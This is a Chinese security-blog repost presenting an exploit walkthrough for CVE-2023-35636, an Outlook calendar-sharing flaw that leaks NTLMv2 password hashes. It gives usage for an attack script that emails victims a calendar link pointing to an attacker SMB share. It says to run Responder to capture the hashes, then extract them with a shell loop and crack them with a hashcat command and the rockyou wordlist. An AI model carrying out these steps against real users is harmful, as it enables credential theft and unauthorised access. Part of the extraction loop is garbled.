CVE-2023-35636 Microsoft Outlook 信息泄露漏洞(泄露密码哈希)

admin 2024年1月31日21:05:11评论24 views字数 878阅读2分55秒阅读模式

CVE-2023-35636 利用 Microsoft Outlook 中的日历共享功能,通过在电子邮件中添加两个标头来指示 Outlook 共享内容并联系指定计算机,从而创造拦截 NTLM v2 哈希的机会。

  • 在 SMB 服务器上运行响应程序

CVE-2023-35636 Microsoft Outlook 信息泄露漏洞(泄露密码哈希)

  • 发送电子邮件并等待(电子邮件收件人防火墙必须让 SMB (445) 流量通过)

用法:./cve-2023-35636.sh mx.fqdn 端口 email_sender email_recipient smb_share

./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\xxxx\mycalendar.ics(不要忘记所有 )

CVE-2023-35636 Microsoft Outlook 信息泄露漏洞(泄露密码哈希)

注意:chmod +x cve-2023-35636.sh

需要应用程序期望

需要合法的 IP 发件人和电子邮件发件人(通过 SPF、DKIM、DMARC)

  • 如果收件人用户单击小日历图标.. BOOM IP/用户(明文)和密码哈希(NTLM-v2-SSP)将发送到您的响应者 IP

CVE-2023-35636 Microsoft Outlook 信息泄露漏洞(泄露密码哈希)

  • 然后你可以尝试使用 hashcat/john the ripper 破解密码

对于用户在strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'

echo "[*] 搜索: $user";

strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt

done

hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O

项目地址

https://github.com/duy-31/CVE-2023-35636

原文始发于微信公众号(TtTeam):CVE-2023-35636 Microsoft Outlook 信息泄露漏洞(泄露密码哈希)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月31日21:05:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-35636 Microsoft Outlook 信息泄露漏洞(泄露密码哈希)https://cn-sec.com/archives/2445426.html

发表评论

匿名网友 填写信息